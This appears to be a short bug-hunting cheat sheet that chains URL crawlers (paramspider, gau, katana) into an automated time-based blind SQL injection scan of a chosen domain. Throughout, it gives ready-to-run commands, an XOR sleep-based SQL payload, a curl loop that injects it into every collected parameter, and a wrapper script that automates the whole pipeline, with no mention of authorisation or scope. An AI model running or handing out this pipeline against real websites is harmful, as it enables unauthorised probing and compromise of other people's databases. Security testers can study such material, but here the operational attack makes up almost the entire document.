1. Using paramspider to crawl website links
install paramspider ==> https://github.com/devanshbatham/ParamSpider
install bsqli ==> https://github.com/B1gN0Se/BSQLi
paramspider -d example.com   # pass the bare domain, not a full URL
cd results
cat example.com.txt | sed 's/FUZZ//g' > final.txt   # paramspider names its output after the target domain
mv final.txt /home/kali/BSQLi
cd BSQLi
python lostsec.py -l final.txt -p payloads/xor.txt -t 5
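For reference, here is a rough sketch of the kind of time-based check BSQLi's xor.txt payloads perform; the payload string and the 5-second threshold below are illustrative examples, not values taken from the tool:

#!/bin/bash
# Append a sleep-based payload to each collected URL (each line ends in "param=")
# and flag responses that take noticeably longer than normal.
# In practice the payload should be URL-encoded; this is only an illustration.
payload="0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z"
while read -r url; do
  t=$(curl -s -o /dev/null -w '%{time_total}' "${url}${payload}")
  # a response slower than ~5 seconds suggests a time-based blind SQLi
  awk -v t="$t" 'BEGIN { exit (t > 5) ? 0 : 1 }' && echo "possible SQLi: $url"
done < final.txt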
2. Using gau to crawl website links
install gau ==> https://github.com/lc/gau
install urldedupe ==> https://github.com/ameenmaali/urldedupe
echo example.com | gau --mc 200 | urldedupe > urls.txt
cat urls.txt | grep -E "\.php|\.asp|\.aspx|\.cfm|\.jsp" | grep '=' | sort > output.txt
cat output.txt | sed 's/=.*/=/' >final.txt
mv final.txt /home/kali/BSQLi
cd BSQLi
python lostsec.py -l final.txt -p payloads/xor.txt -t 5
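To see what the filtering above leaves behind, you can run the sed step on a single made-up URL (the URL below is just an example):

echo 'http://example.com/item.php?id=42&sort=price' | sed 's/=.*/=/'
# prints: http://example.com/item.php?id=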
3. Using katana to crawl website links
install katana ==> https://github.com/projectdiscovery/katana
install anew ==> https://github.com/tomnomnom/anew
echo example.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | urldedupe >output.txt
katana -u http://example.com -d 5 | grep '=' | urldedupe | anew output.txt
cat output.txt | sed 's/=.*/=/' >final.txt
mv final.txt /home/kali/BSQLi
cd BSQLi
python lostsec.py -l final.txt -p payloads/xor.txt -t 5
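If you prefer to run all three collectors in one pass, a minimal wrapper along these lines works; DOMAIN and BSQLI_DIR are placeholders for your own target and install path:

#!/bin/bash
DOMAIN="example.com"          # target domain (placeholder)
BSQLI_DIR="/home/kali/BSQLi"  # path to your BSQLi checkout (placeholder)

# 1. paramspider (writes results/<domain>.txt, with FUZZ markers to strip)
paramspider -d "$DOMAIN"
cat results/*.txt | sed 's/FUZZ//g' > ps.txt

# 2. gau and 3. katana, deduplicated as in the steps above
echo "$DOMAIN" | gau --mc 200 | urldedupe > gau.txt
echo "$DOMAIN" | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | urldedupe > kat.txt

# merge, keep only parameterised URLs, strip values, dedupe
cat ps.txt gau.txt kat.txt | grep '=' | sed 's/=.*/=/' | sort -u > "$BSQLI_DIR/final.txt"

cd "$BSQLI_DIR" && python lostsec.py -l final.txt -p payloads/xor.txt -t 5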
Credit to ==> Lostsec